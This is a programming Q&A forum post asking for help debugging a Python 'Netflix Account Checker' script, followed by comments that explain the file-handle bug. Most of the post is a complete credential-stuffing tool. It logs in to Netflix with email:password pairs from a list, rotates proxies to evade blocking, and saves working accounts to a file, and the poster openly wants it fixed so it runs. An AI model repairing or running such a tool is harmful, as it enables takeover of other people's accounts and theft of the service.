# stat: path should be string, bytes, os.PathLike or integer, not TextIOWrapper

Tags: python

So, i want to check netflix accounts and i found a checker but the checker dont work and i want to repair it

Error message : stat: path should be string, bytes, os.PathLike or integer, not TextIOWrapper

```
#!/usr/bin/python

from __future__ import division
from progressbar import ProgressBar
from  mechanize import Browser
from os import path
from random import randint
from time import sleep

working=[]
dead=[]
notActive=[]
br = Browser()

def testAccount(email,password,typeProxy):
            global currentProxy
            global br

            logoutURL = 'https://www.netflix.com/SignOut?lnkctr=mL'
            page = 'Sorry, we are unable to process your request.'
            while (page.find('Sorry, we are unable to process your request.') != -1):
                try:
                    proxies("Default")
                    loginURL = 'https://www.netflix.com/login'
                    br.set_handle_equiv(True)
                    br.set_handle_redirect(True)
                    br.set_handle_referer(True)
                    br.set_handle_robots(False)
                    br.addheaders = [('User-agent', 'Firefox')]
                    if (currentProxy != ''):
                        if (typeProxy != 'HTTP'):
                            br.set_proxies({"socks5": currentProxy})
                        else:
                            br.set_proxies({"HTTP": currentProxy})
                    else:
                        br.set_proxies()
                    br.open(loginURL)
                    br.select_form(nr=0)
                    br.form['userLoginId'] = email
                    br.form['password'] = password
                    response = br.submit()
             
                    if (response.code == 200):
                        page = response.read().decode()
                        if (page.find('Sorry, we are unable to process your request.') != -1):
                            pass
                        elif (response.geturl().find('browse') != -1):
                            br.open(logoutURL)
                            working.append(email+':'+password+'\n')
                        elif (page.find('Finish Sign-up') != -1):
                            br.open(logoutURL)
                            notActive.append(email+':'+password)
                        elif (response.geturl().find('getstarted') != -1):
                            br.open(logoutURL)
                            notActive.append(email+':'+password)
                        elif (response.code == 500):
                            errorFile = open('error.txt', 'a+')
                            errorFile.write('500-Bad Gateway: currentProxy')
                            errorFile.close()
                        elif (page.find('Incorrect password') != -1):
                            dead.append(email+':'+password)
                        elif (page.find('find an account with this email address.') != -1):
                            dead.append(email+':'+password)
                        else:
                            print('Unknown Error. (7)')
                            errorFile = open('error.txt', 'a+')
                            errorFile.write(response.geturl()+'\n'+page)
                            errorFile.close()
                    else:
                        print('Error: '+str(response.code)+' Trying again.')
                except Exception as errorMsg:
                    print (response.geturl().find('getstarted'))
                    errorFile = open('error.txt', 'a+')
                    errorFile.write(response.geturl()+'\n'+page)
                    errorFile.close()    
                    br.open(logoutURL)
                    sleep(3)

def writeToFile():
    global working
    global dead
    global notActive

    workingAccounts = open('workingAccounts.txt', 'w+', encoding="utf-8")
    deadAccounts = open('deadAccounts.txt', 'w+', encoding="utf-8")
    nonActiveFile = open('notActive.txt', 'w+', encoding="utf-8")
    for all in working:
        workingAccounts.write(all)
    for all in dead:
        deadAccounts.write(all)
    for all in notActive:
        nonActiveFile.write(all)
    workingAccounts.close()
    deadAccounts.close()
    nonActiveFile.close()
    print ('')
    print ('Summary:')
    print ('--------')
    print ('')
    print ('Working accounts: ' + str(len(working)))
    print ('Inactive Accounts: '+ str(len(notActive)))
    print ('Dead accounts: ' + str(len(dead)))
    print ('')

def proxies(country):
    global currentProxy
    proxyFile = "proxy-Default.txt"
    if (path.exists(proxyFile) and path.getsize(proxyFile) > 0):
        lines = open(proxyFile, "r")
        filestream = open(proxyFile, "r")
        randomProxyID = randint(0,sum(1 for row in lines) - 1)
        for proxyID, proxy in enumerate(filestream):
            if (proxyID == randomProxyID):
                currentProxy = proxy
                break
        filestream.close()
    else:
        currentProxy = ''

def main():   
    global debug
    global working
    global dead

    print('')
    print ('########################################################')
    print ('####             Netflix Account Checker            ####')
    print ('####              Coded by Abdes Salam              ####')
    print ('####                                                ####')
    print ('####                 DZ FAMILY TECH                 ####')
    print ('########################################################')
    print ('')

    try:
        accounts = open('checkAccounts.txt', "r", encoding="utf-8")
        if (path.exists(accounts) and path.getsize(accounts) > 0):
            progress = 0
            maxValue = sum(1 for acc in open(accounts))
            pbar = ProgressBar(maxval=maxValue).start()
            with open(accounts, "r") as filestream: 
                for line in filestream:
                    pbar.update(progress)
                    progress += 1
                    accountArgument = line.split(':')
                    args = len(accountArgument)
                    if (args == 3 or args == 2):
                        email = accountArgument[0]
                        password = accountArgument[1]
                        testAccount(email,password,'HTTP')
                    else:
                        print('Account List is not formatted properly.')
            
            pbar.finish()
            writeToFile()
        else:
            print('Accounts file is empty!')
            print('')
    except Exception as errorMsg:
        print('')
        print(errorMsg)
        print('An error occurred.. Saving progress...')
        print('')
        writeToFile()

if __name__ == "__main__":
  main()
```

so i want help from u guys because i want to solved it

Thanks all for ur help if u help me

I try to change the encode for the checkingAccounts.txt and add encoding ="UTF-8"

Comment: Post the full traceback message. It will show the failing line

Comment: You're calling `open` and storing the result as `accounts`. That's a `TextIOWrapper` but you treat it as a `str`. Then you pass it to `path.exists` and that raises the error.

Comment: In terms of debugging and posting here, you are better off pulling out the small bit of failing code and testing it separately. Much of the code here is not relevant to the error.